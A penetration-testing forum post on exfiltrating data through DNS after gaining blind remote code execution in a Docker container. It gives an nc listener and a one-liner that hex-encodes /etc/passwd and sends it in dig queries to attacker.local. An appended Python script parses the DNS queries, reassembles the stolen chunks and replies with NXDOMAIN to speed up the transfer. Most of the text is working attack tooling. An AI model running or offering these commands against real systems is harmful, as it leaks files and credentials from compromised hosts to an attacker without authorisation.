DNS Exfiltration (oneliner)

Penetration testing
anonymousspammer
Posts: 12
Joined: Mon Sep 18, 2017 5:48 pm

Postby anonymousspammer » Tue Aug 21, 2018 2:41 pm

So today I came across an interesting situation where I have a blind RCE in a Docker container, part of a large cluster of containers building the mobile application I was testing. The interesting part was that only UDP/53 (DNS) was allowed as outbound traffic, and I want to share the solution for getting data out over DNS with my favorite one-liners:

The tools used are standard on many *nix systems: xxd, dig, nc

This is our listener on attacker.local:


# -l listen, -u UDP, -p 53 port (needs root), -k keep listening after the first datagram,
# -n no reverse lookups of the peer, -vv verbose (messages go to stderr)
sudo nc -l -n -vv -p 53 -u -k


And this is the code we run on the server:


# xxd -p -c16: 16 raw bytes per line as 32 hex characters, which fits in one DNS label (max 63).
# +tries=1 +time=1: the nc listener never answers, so without these dig would resend each
# query up to 3 times with a 5 s timeout, i.e. about 15 s per chunk.
$ for x in $(xxd -p -c16 /etc/passwd); do dig +tries=1 +time=1 $x @attacker.local; done


Also, if you save the resulting information to a file using:


# -vv chatter goes to stderr, so /tmp/dump holds only the raw datagrams, i.e. complete DNS packets
sudo nc -l -n -vv -p 53 -u -k > /tmp/dump


You can easily review what you've taken with:


# reverse the plain hex; xxd -r -p ignores non-hex bytes, so the DNS headers around each label
# drop out, except when random header or EDNS cookie bytes happen to form adjacent ASCII hex pairs
xxd -p -r /tmp/dump

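The following is an added example, not code from the original post or from the poster: a receiver for the same hex-over-QNAME scheme that parses the DNS wire format instead of hex-reversing a raw nc dump. The dump written by nc holds complete packets (header, question, dig's EDNS OPT record), so decoding only the queried name avoids stray bytes; the receiver also drops dig's retransmissions (same transaction id and name) and answers every query with NXDOMAIN so dig returns immediately instead of retrying. It assumes the sender is exactly the one-liner above (first label = plain hex of one 16-byte chunk from `xxd -p -c16`); the default bind port 5353, the output file name and the NXDOMAIN-reply trick are my choices, not the poster's.

```python
"""DNS exfiltration receiver (added example; not from the original post).

Assumed sender: the post's one-liner, i.e. each query's first label is the
plain hex of one 16-byte chunk as produced by `xxd -p -c16`.
"""
import binascii
import socket
import struct


def chunk_hex(data, size=16):
    """Same output as `xxd -p -c<size>`: one hex string per size-byte chunk."""
    return [data[i:i + size].hex() for i in range(0, len(data), size)]


def build_query(qname, txid):
    """Minimal query shaped like dig's (RD+AD flags, one question, one EDNS
    OPT record). Used here only to construct test packets offline."""
    pkt = struct.pack(">HHHHHH", txid, 0x0120, 1, 0, 0, 1)
    for label in qname.rstrip(".").split("."):
        pkt += bytes([len(label)]) + label.encode("ascii")
    pkt += b"\x00" + struct.pack(">HH", 1, 1)               # QTYPE=A, QCLASS=IN
    pkt += b"\x00" + struct.pack(">HHIH", 41, 4096, 0, 0)   # root name, OPT, bufsize, TTL, rdlen
    return pkt


def parse_query(pkt):
    """Return (txid, qname, question_section) for a DNS query, else None."""
    if len(pkt) < 12:
        return None
    txid, flags, qdcount = struct.unpack(">HHH", pkt[:6])
    if flags & 0x8000 or qdcount < 1:          # QR=1 is a response, not a query
        return None
    labels, off = [], 12
    while off < len(pkt):
        n = pkt[off]
        if n == 0:                             # root label ends the name
            off += 1
            break
        if n & 0xC0 or off + 1 + n > len(pkt): # compression pointer or truncated label
            return None
        labels.append(pkt[off + 1:off + 1 + n].decode("ascii", "replace"))
        off += 1 + n
    else:
        return None                            # ran off the end before the root label
    if off + 4 > len(pkt):                     # QTYPE and QCLASS must follow
        return None
    return txid, ".".join(labels), pkt[12:off + 4]


def build_nxdomain(txid, question):
    """Reply with QR, RD, RA set and RCODE=3 (NXDOMAIN). dig accepts it and
    stops, so the sender loop no longer waits for a timeout per chunk."""
    return struct.pack(">HHHHHH", txid, 0x8183, 1, 0, 0, 0) + question


class Collector:
    """Reassembles chunks in arrival order. Retransmissions by dig reuse the
    same transaction id and name and are dropped; genuinely repeated chunks
    survive because each dig invocation picks a fresh random id."""

    def __init__(self):
        self.seen = set()
        self.chunks = []

    def feed(self, pkt):
        """Consume one datagram; return the reply to send back, or None."""
        parsed = parse_query(pkt)
        if parsed is None:
            return None
        txid, qname, question = parsed
        if (txid, qname) not in self.seen:
            self.seen.add((txid, qname))
            try:
                self.chunks.append(binascii.unhexlify(qname.split(".")[0]))
            except binascii.Error:
                pass                           # some other lookup reached us; not a chunk
        return build_nxdomain(txid, question)

    def data(self):
        return b"".join(self.chunks)


def serve(bind=("0.0.0.0", 5353), outfile="dump.bin"):
    """Live receiver. Port 5353 (assumption) runs unprivileged; bind to 53 as
    root for the real sender. The output file is rewritten after every chunk."""
    col = Collector()
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
        s.bind(bind)
        while True:
            pkt, peer = s.recvfrom(4096)
            reply = col.feed(pkt)
            if reply is not None:
                s.sendto(reply, peer)
                with open(outfile, "wb") as f:
                    f.write(col.data())


if __name__ == "__main__":
    serve()
```

To pair it with the one-liner from the post, run `serve(("0.0.0.0", 53))` as root in place of the nc listener and keep the same dig loop; because every query gets an answer, the `+tries`/`+time` tuning stops mattering and the transfer runs at network speed.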